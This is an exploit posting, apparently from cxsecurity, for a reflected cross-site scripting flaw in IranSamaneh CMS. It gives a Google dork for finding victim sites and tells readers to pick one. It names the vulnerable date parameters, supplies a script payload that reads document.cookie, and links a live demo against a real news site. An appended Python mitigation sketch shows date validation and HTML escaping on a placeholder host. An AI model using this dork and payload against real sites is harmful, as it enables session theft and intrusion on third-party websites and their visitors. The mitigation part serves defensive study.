IranSamaneh CMS Cross Site Scripting

2017.04.05
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

##########################
# Exploit Title: IranSamaneh CMS Cross Site Scripting
# Google Dork: intext:"طراحی و تولید: " ایران سامانه " " intitle:آرشیو
# Date: 2017-04-05
# Exploit Author: Sh4dow
# My Team: Zero Security Group
# Vendor Homepage: https://iransamaneh.com/
# Software Link: -
# Version: all
# Tested on: Kali Linux
# CVE : -
##########################

Description:
IranSamaneh: design and development of web-based systems built to host corporate portals and news agency sites.

-----------------
Proof, Step by Step:

1- Use the dork in Google and choose a site.
2- Change the URL (fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=1396/01/16&p=2)
3- Now use an XSS script in (from_date= or to_date=)

# Example Demo Bypass Script: ( `'"><b><script>alert(document.cookie)</script></b> )

# Demo:
# You can find many sites by using the Google Dork

----------------------------------------
Live Demo:
http://www.tabnak.ir/fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20&from_date=1392/07/06&to_date=`%27%22%3E%3Cb%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/b%3E&p=2
----------------------------------------
#
# Msg: Brother SOLTAN SILENT Returned
#
#---------------------------------------
# Greetz: Ghostman And My Pc
# We Are: Sh4dow - Ghostman - SOLTAN SILENT - And All Member
# Iranian Underground Researchers
# https://telegram.me/ZeroSecOfficial
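
Mitigation sketch for the reflected from_date / to_date parameters described above. This is an added example, not code from the advisory or from the vendor. It assumes the archive page echoes each date into an input's value attribute and that dates are Jalali YYYY/MM/DD as in the sample URL; the host cms.example and all function names are hypothetical.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: archive filters are Jalali dates written YYYY/MM/DD,
# as in the advisory's sample URL (1392/07/06).
DATE_RE = re.compile(r"1[34]\d{2}/(0[1-9]|1[0-2])/(0[1-9]|[12]\d|3[01])")
DATE_PARAMS = ("from_date", "to_date")


def clean_date(value, default=""):
    """Allow-list check: return value only if it is a well-formed date."""
    return value if DATE_RE.fullmatch(value) else default


def escape_attr(value):
    """Encode for a double-quoted HTML attribute (escapes & < > " ')."""
    return html.escape(value, quote=True)


def render_date_input(name, raw_value):
    """Echo a date filter back into the page.

    Validation is the first layer, output encoding the second, so the value
    cannot close the attribute even if the validation is later loosened.
    """
    safe = escape_attr(clean_date(raw_value))
    return '<input type="text" name="%s" value="%s">' % (name, safe)


def render_archive_filters(url):
    """Parse the query string and render both date inputs (hypothetical view)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return "\n".join(
        render_date_input(p, query.get(p, [""])[0]) for p in DATE_PARAMS
    )


# Constructed request against a placeholder host, carrying the advisory's
# test string in to_date.
SAMPLE_URL = (
    "http://cms.example/fa/archive?service_id=-1&sec_id=-1&cat_id=-1&rpp=20"
    "&from_date=1392/07/06"
    "&to_date=%60%27%22%3E%3Cb%3E%3Cscript%3Ealert(document.cookie)"
    "%3C/script%3E%3C/b%3E&p=2"
)

if __name__ == "__main__":
    print(render_archive_filters(SAMPLE_URL))
```

The valid from_date is echoed unchanged, while the malformed to_date is replaced by an empty value before it reaches the markup.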



Copyright 2017, cxsecurity.com